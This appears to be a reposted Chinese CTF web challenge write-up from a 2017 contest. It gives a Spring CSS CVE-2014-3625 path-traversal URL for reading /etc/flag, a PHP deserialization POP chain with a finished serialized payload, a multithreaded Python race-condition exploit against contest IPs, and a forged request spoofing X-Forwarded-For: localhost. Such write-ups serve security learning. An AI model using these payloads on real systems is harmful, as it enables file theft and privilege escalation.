内容简介:2017首届全球华人网络安全技能大赛-web-writeup
springcss
https://github.com/ilmila/springcss-cve-2014-3625
可以这样获取到flag: http://218.2.197.232:18015/spring-css/resources/file:/etc/flag
php序列化
http://wooyun.jozxing.cc/static/drops/tips-3909.html
存储$_SESSION用php_serialize处理器,读取数据用 php 处理器
通过注入 | 字符伪造了对象的序列化数据
<?php
$FLAG = "flag{aaaaaaaa}";
class TOPA {
public $token;
public $ticket;
public $username;
public $password;
function __toString() {
if ($this->username == 'aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb') {
return 'key is:{' . $this->token . '}' . "\n";
}
}
}
class TOPB {
public $obj;
public $attr;
function __construct() {
$this->attr = null;
$this->obj = null;
}
function __toString() {
$this->obj = unserialize($this->attr);
$this->obj->token = $FLAG;
if ($this->obj->token === $this->obj->ticket) {
return (string) $this->obj;
}
}
}
class TOPC {
public $obj;
public $attr;
function __wakeup() {
$this->attr = null;
$this->obj = null;
}
function __destruct() {
echo $this->attr;
}
}
利用链:C的__destruct在echo的时候,可以调用B的__toString,再通过(string)来调用A类的__toString
这里面牵涉到两个问题,第一个是C中的wakeup,这个可以通过修改属性名的个数绕过,第二个就是$this->obj->token === $this->obj->ticket
这个可以通过 &
指向同一变量
<?php
$b = new TOPA;
$b->token = Null;
$b->ticket = &$b->token;
$b->username = 'aaaaaaaaaaaaaaaaa';
$b->password = 'bbbbbbbbbbbbbbbbbb';
echo serialize($b) . "\n\n";
$a = new TOPB;
$a->attr = 'O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";s:17:"aaaaaaaaaaaaaaaaa";s:8:"password";s:18:"bbbbbbbbbbbbbbbbbb";}';
$a->obj = '';
// echo serialize($a) . "\n\n";
$c = new TOPC;
$c->attr = $a;
echo serialize($c) . "\n\n";
-------------------------------
最后的payload:
O:4:"TOPC":4:{s:3:"obj";N;s:4:"attr";O:4:"TOPB":2:{s:3:"obj";s:0:"";s:4:"attr";s:127:"O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";s:17:"aaaaaaaaaaaaaaaaa";s:8:"password";s:18:"bbbbbbbbbbbbbbbbbb";}";}}
学到一个新的标识,R
条件竞争
<?php
header("Content-type: text/html; charset=utf-8");
session_start();
$mysqli = new mysqli("localhost", "root", "", "gctf09");
if ($mysqli->connect_errno) {
die("数据库连接错误,多次出现请联系管理员。");
}
//打印源码
if(isset($_REQUEST['showcode'])){
highlight_file(___FILE___);
exit();
}
$user="";
// 初次访问生成用户
if(!isset($_SESSION["name"])){
$user=substr(md5(uniqid().uniqid()),8,16);
$_SESSION["name"]=$user;
$stmt = $mysqli->prepare("INSERT INTO gctf09.`user` (name,pass) VALUES (?,?)");
$stmt->bind_param("ss",$user,md5($user));
$stmt->execute();
$stmt->close();
$stmt = $mysqli->prepare("INSERT INTO gctf09.`priv` (name,notadmin) VALUES (?,TRUE)");
$stmt->bind_param("s",$user);
$stmt->execute();
$stmt->close();
}else{
$user=$_SESSION["name"];
}
//重置时清理用户信息
if($_SERVER["REQUEST_METHOD"] === "POST" && $_GET['method']==="reset" && isset($_POST['password']) ){
$stmt = $mysqli->prepare("DELETE FROM gctf09.`user` where name=?");
$stmt->bind_param("s",$user);
$stmt->execute();
$stmt = $mysqli->prepare("DELETE FROM gctf09.`priv` where name=?");
$stmt->bind_param("s",$user);
$stmt->execute();
$stmt = $mysqli->prepare("INSERT INTO gctf09.`user` (name,pass) VALUES (?,?)");
$stmt->bind_param("ss",$user,md5($_POST['password']));
$stmt->execute();
$stmt->close();
//判断用户权限时会查询priv表,如果为不为TRUE则是管理员权限
$stmt = $mysqli->prepare("INSERT INTO gctf09.`priv` (name,notadmin) VALUES (?,TRUE)");
$stmt->bind_param("s",$user);
$stmt->execute();
$stmt->close();
$mysqli->close();
die("修改成功");
}
$mysqli->close();
?>
python:
#coding=utf8
import requests
from bs4 import BeautifulSoup
import threading
user = ''
def exp():
global user
while True:
s = requests.session()
r = s.get('http://218.2.197.242:18009/')
soup = BeautifulSoup(r.content, 'html.parser')
user = soup.find(id="name")['value']
print user
data = {
'password' : 'helloworld'
}
r1 = s.post('http://218.2.197.242:18009/index.php?method=reset',data=data)
def login():
global user
while True:
data = {
'name' : user,
'password' : 'helloworld'
}
r2 = requests.post('http://218.2.197.242:18009/login.php?method=login',data=data)
print user,r2.content
def main():
global user
threadpool=[]
for n in xrange(30):
th = threading.Thread(target=login)
th.setDaemon(True)
threadpool.append(th)
for n in xrange(3):
th = threading.Thread(target=exp)
th.setDaemon(True)
threadpool.append(th)
for th in threadpool:
th.start()
for th in threadpool :
threading.Thread.join(th)
if __name__ == '__main__':
main()
web综合
有svn,但是只能通过wc.db来得到hash,然后get到源码
工具: https://github.com/anantshri/svn-extractor
Forbidden
GET / HTTP/1.1 Host: www.topsec.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 98;.NET CLR 8) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: http://www.baidu.com Accept-Encoding: gzip, deflate, sdch Accept-Language: de-DE Cookie: login=4e7a51334d6a63314e6a553d; PHPSESSID=h2cbas2n7mbli0hkll55sc84o7; 186221D9=1; 6EE211F6=1; X-Forwarded-For: localhost x-requested-with: XMLHttpRequest Connection: close
以上所述就是小编给大家介绍的《2017首届全球华人网络安全技能大赛-web-writeup》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- 首届官方 React Native "吐槽"大会?
- 通知丨 首届中国心电智能大赛复赛开启
- 探寻首届进博会安保背后的创新力量
- 九州云黄舒泉当选StarlingX 首届TSC
- Moncler 举办首届“黑客马拉松”,激发员工创新能力
- 首战告捷!网易有道斩获首届NLPCC中文语法错误修正比赛冠军
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Flash第一步
陈冰 / 清华大学出版社 / 2006-3 / 45.00元
《Flash第1步:ActionScript编程篇》(珍藏版)为《Flash第一步》的ActionScript编程篇,包含后4部分内容。第3部分为ActionScript篇,你将学会像一个软件设计师那样来思考问题,并掌握在Flash中进行程序开发工作所必须具备的重要知识,还将学会运用Flash完整的编程体系来完成从简单到复杂的各种编程任务。另外,在开发一个Flash应用过程中会涉及的各种其他Web......一起来看看 《Flash第一步》 这本书的介绍吧!
